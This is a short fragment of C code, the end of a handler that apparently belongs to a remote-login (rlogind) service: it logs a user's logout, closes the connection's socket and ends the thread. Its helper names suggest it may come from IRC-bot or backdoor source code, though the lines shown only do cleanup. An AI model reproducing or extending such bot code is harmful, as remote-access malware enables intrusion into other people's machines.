addlogv("[RLOGIND]: User logged out: <%s@%s>.", RemoteUser, HostName);
fshutdown(threads[threadnum].sock,SD_BOTH);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}